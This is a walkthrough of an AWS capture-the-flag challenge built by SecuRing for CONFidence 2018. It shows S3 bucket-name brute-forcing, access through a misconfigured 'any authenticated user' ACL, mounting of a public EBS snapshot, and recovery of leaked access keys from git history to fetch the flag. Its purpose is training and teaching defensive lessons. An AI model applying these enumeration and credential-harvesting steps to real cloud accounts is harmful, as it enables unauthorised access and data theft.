Recently SecuRing prepared a fancy challenge ahead of the CONFidence 2018 conference. We received such positive feedback from users (thnx!!!) that we decided to keep the challenge infrastructure alive, so everyone can still try their hand at finding vulnerabilities in AWS. If you haven't played it yet, please leave this article now (otherwise it will spoil everything) and go directly here to start the challenge. Share it with your friends, and once you finish it (or get stuck and don't know what to do next), come back to this post. In this article you'll find not only a walkthrough of the challenge but also an explanation of the real-world problems I wanted to highlight.
3, 2, 1… Let's get started!
Let's start by analyzing the challenge description and pulling out only the important notes (in fact, understanding what you read is the first task of this challenge :D ).
The important notes we can extract from the challenge description are the following: KRK Analytica uses AWS, they have more than one bucket, the final flag "secret_codes.txt" is stored in the "krkanalytica-confidential" bucket, and Mike Shwarzberg has access keys to it.
As you may suspect, trying to access the final flag results in an access denied message:
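The first naive attempt can be sketched with the AWS CLI (the `--no-sign-request` anonymous call is my assumption about how you'd try it first):

```shell
# Anonymous attempt at the final flag; --no-sign-request sends an
# unauthenticated request. This ends with "Access Denied".
aws s3 cp s3://krkanalytica-confidential/secret_codes.txt . --no-sign-request
```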
Ok, so it seems the sec guy Mike is not so dumb :) The next piece of information we can deduce from the description is that they have more than one bucket. It's quite common for people to use naming patterns for their buckets, like "example-prod", "example-dev", etc.
An interesting thing here is the fact that anyone can name their bucket however they want. This introduces some risks; for example, cybercriminals can use it for phishing attacks (if a company widely uses the buckets "example-media" and "example-doc", it would be quite easy to convince an employee to download a file from "example-policies").
There are open source tools available which perform such name permutations and automatically verify whether a bucket exists. Some of them are LazyS3, s3-buckets-bruteforcer, and inSp3ctor. Let's try LazyS3. It works quite slowly, but that's a perfect opportunity to take a break and grab some coffee :)
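The core idea behind these tools can be sketched in a few lines of shell. This is a minimal illustration, not the real LazyS3 code; the base name and suffix list are example assumptions:

```shell
# Minimal sketch of the name-permutation idea behind tools like LazyS3
# (not the actual tool's code; the suffix list is an example assumption).
base="krkanalytica"
suffixes="backup dev prod staging test confidential media docs"

candidates=""
for s in $suffixes; do
  candidates="$candidates $base-$s"
done
echo $candidates | tr ' ' '\n'

# Each candidate can then be probed anonymously, e.g.:
#   curl -s -o /dev/null -w '%{http_code}\n' https://BUCKET.s3.amazonaws.com/
# 404 = no such bucket, 403 = exists but anonymous access is denied,
# 200 = anonymously listable.
```

The real tools also mix in prefixes, separators and wordlists, but the principle is the same: generate names, probe each one, and interpret the HTTP status code.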
Once we're back, we can see that the tool found two buckets: "krkanalytica-confidential" and "krkanalytica-backup". The response code we get for both of them is 403, which means we have to be authenticated to access their content (or at least to list it). However, a quite old problem related to S3 access control is granting access to the group "Any authenticated AWS user".
"Any authenticated AWS user" is a group that many administrators mistakenly interpret as granting permissions only to accounts under their root account. In fact, it gives access to absolutely any AWS account, including those created on the free tier :) Well… honestly, I've never understood the purpose of this group. Nevertheless, while this group is no longer available in the AWS console (since mid-2017), it can still be assigned, for example via the AWS CLI.
So let's try to access the "krkanalytica-backup" bucket using my free tier account:
Voila! Now we can access all the bucket's content. Let's download everything to a sandboxed environment (remember, it's untrusted content, and you don't want it to fill up your disk):
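With any authenticated account configured in the AWS CLI, listing and mirroring the bucket looks roughly like this (the profile name "free-tier" is just an example; any AWS account works because of the misconfigured group):

```shell
# List the bucket's content with any authenticated AWS account
# (the profile name "free-tier" is an example assumption).
aws s3 ls s3://krkanalytica-backup --profile free-tier

# Mirror the whole bucket into a local sandbox directory.
aws s3 sync s3://krkanalytica-backup ./krkanalytica-backup --profile free-tier
```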
Let's go through the content. The "avatars" and "Offtop" folders contain only photos, which won't reveal anything interesting. The "Blog" folder contains some WordPress files and a "users.sql" file. As the author, I can tell you it's just a dead end :) Similarly, the "HR" folder doesn't contain anything that helps to solve the challenge. The "Policies and docs" folder contains a subfolder "To read in nearest future". Well, it's just a troll message indicating that, unfortunately, for too many people security is still not a priority: they prefer to deploy their infrastructure first and fix security issues later, if any appear. However, this "later" often happens too late, or never.
In the "Website" folder there's a copy of Cambridge Analytica's website; it's a funny touch indicating that the name "Krakow Analytica" refers to the recent Facebook affair ;) Finally, we come to the "Tests" folder. The "Personal" subfolder contains a password-protected .zip archive. The easily guessable password "123456" reveals some old-school sex games; well, it seems Mike is an old perv :) Another thing we can find in the "Tests" folder is a repository of "CloudSploit", a really handy tool for performing security assessments of AWS infrastructure.
However, administrators who blindly rely on security tools forget that no tool will ever give 100% protection, because it will never catch all leaks. Remember that security tools are a great addition to your security process, but your infrastructure should also be subject to manual assessment (security audits)!
Further analysis of the "krkanalytica-backup" content reveals some emails. Among them you can find a mail from Alice informing Mike about the open access to "krkanalytica-backup". Unfortunately, my experience shows that most administrators behave exactly like Mike: they simply ignore such messages.
Among those emails there is an interesting one, "Re_ AWS Security Instance.eml", which discloses the ID of a public snapshot. The easiest way of sharing a snapshot is making it public.
But sometimes people forget that "public" means accessible to anyone, not only their colleagues from work. Always double-check that you don't leave any sensitive data in public snapshots.
Having the snapshot ID, we have to find its region to be able to mount it on our EC2 instance. Going through the available regions, you'll finally find the accessible snapshot in the region "eu-west-1", EU (Ireland). Here's the URL:
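Instead of clicking through the console, the region hunt can also be scripted; a rough sketch (the snapshot ID below is a placeholder, substitute the one disclosed in Mike's email, and the region list is an example, not exhaustive):

```shell
# Probe each region for the public snapshot. The ID is a placeholder;
# use the one from Mike's email. Extend the region list as needed.
snapshot_id="snap-xxxxxxxxxxxxxxxxx"
for region in eu-west-1 eu-west-2 eu-central-1 us-east-1 us-east-2 us-west-2; do
  if aws ec2 describe-snapshots --snapshot-ids "$snapshot_id" \
       --region "$region" >/dev/null 2>&1; then
    echo "Found in region: $region"
  fi
done
```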
Now it's time to mount the snapshot and see if there's anything interesting inside. To do this, you first have to create an EC2 instance (a free tier t2.micro instance with default settings will work perfectly here). To access the snapshot's content, you first have to create a volume from the snapshot (in the AWS console: Services -> EC2 -> Volumes -> Create Volume, and provide the snapshot ID you read in Mike's email). Once the volume is created, it's time to attach it to our instance (in the Volumes tab: Actions -> Attach volume, and choose your instance ID):
Then log in to your instance, find the attached volume, and mount it to your file system:
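On an Amazon Linux instance the steps look roughly like this (the device name depends on what you chose when attaching the volume; /dev/xvdf is typical):

```shell
# Identify the attached volume; device names vary, /dev/xvdf is typical.
lsblk

# Mount the volume's first partition and browse it. If the snapshot has
# no partition table, mount /dev/xvdf directly instead of /dev/xvdf1.
sudo mkdir -p /mnt/snapshot
sudo mount /dev/xvdf1 /mnt/snapshot
ls -la /mnt/snapshot/home
```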
If you search the "home" folder, you'll quickly find the subfolder "AWS Tools":
The "BucketScanner" folder looks interesting, doesn't it? Inside you can find a modified copy of BucketScanner's code, but nothing interesting in it :( But wait, if you list the directory with the '-a' parameter, you will also see hidden files and folders, and among them a '.git' folder. Git logs are a source of many key leaks, so let's see if the logs of this repository contain anything interesting. To display all commits with their changes, run the command:
git log -p
If git is missing on your instance, you can install it with 'sudo yum install git'.
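To see why git history is such a rich source of leaks, here's a tiny self-contained demo (the repository and the key are fabricated for illustration): a secret committed once stays visible in `git log -p` even after it has been removed from the working tree.

```shell
# Self-contained demo: a secret removed from the working tree
# still lives in the git history. The key below is fake.
tmp=$(mktemp -d)
cd "$tmp"
git init -q demo && cd demo
git config user.email demo@example.com
git config user.name demo

echo 'aws_access_key_id = AKIAFAKEFAKEFAKEFAKE' > config.ini
git add config.ini
git commit -qm 'add config'

echo '# credentials moved elsewhere' > config.ini
git commit -qam 'remove hardcoded key'

# The key is gone from the file... but not from the history:
leaked=$(git log -p | grep -c 'AKIAFAKEFAKEFAKEFAKE')
echo "occurrences in history: $leaked"
```

The same applies to any repository copied around in backups: deleting a secret in a later commit does not make the earlier commits forget it.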
Scanning large amounts of data can be very time consuming, so to automate this process I've developed DumpsterDiver. This tool can automatically find secret leaks in any text file, archive, or git object (git logs).
Sweeet, right? Now it's time to create Mike's profile in your AWS CLI and download the final flag:
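The final steps look roughly like this (the profile name "mike" and the key values are placeholders; use the credentials recovered from the git history):

```shell
# Create a profile from the leaked credentials. The values below are
# placeholders; substitute the keys found in the git history.
aws configure set aws_access_key_id     AKIAXXXXXXXXXXXXXXXX --profile mike
aws configure set aws_secret_access_key xXxXxXxXxXxXxXxXxXxX --profile mike

# Download the final flag using Mike's profile.
aws s3 cp s3://krkanalytica-confidential/secret_codes.txt . --profile mike
```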
The "secret_codes.txt" file ends this challenge. However, if you open it, you'll see a QR code. If you decode it, you'll see a gif of Mike Zuckerberg transmitting a hidden message in reptilian language. Any suggestions as to what the transmitted message could be? :)
I hope you liked this challenge and learned something new. Remember that doing is the most effective way of learning, so stop reading and go through the challenge yourself!
I'd be very happy to hear your feedback. Would you like to see more cloud challenges like this one? Let us know!